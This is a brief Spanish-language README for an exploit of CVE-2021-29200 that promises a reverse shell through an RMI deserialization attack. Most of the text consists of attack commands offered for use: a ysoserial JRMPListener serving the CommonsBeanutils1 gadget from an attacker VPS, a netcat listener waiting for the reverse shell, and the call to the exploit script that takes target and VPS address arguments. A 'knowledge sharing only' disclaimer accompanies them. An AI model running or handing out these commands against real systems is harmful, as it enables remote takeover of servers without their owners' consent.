
Exploit para CVE-2021-29200 que permite la ejecución remota de comandos mediante un ataque de deserialización RMI con un listener JRMP y entrega de payload de reverse shell.
CVE-2021-29200 EXP - Se puede obtener una shell reversa con éxito
Este artículo y la herramienta son solo para compartir conocimientos técnicos. Está estrictamente prohibido su uso ilegal. El usuario asume toda la responsabilidad por las consecuencias.
RMI en el VPS en el puerto 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[comando a ejecutar]'
nc en el VPS en el puerto 8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
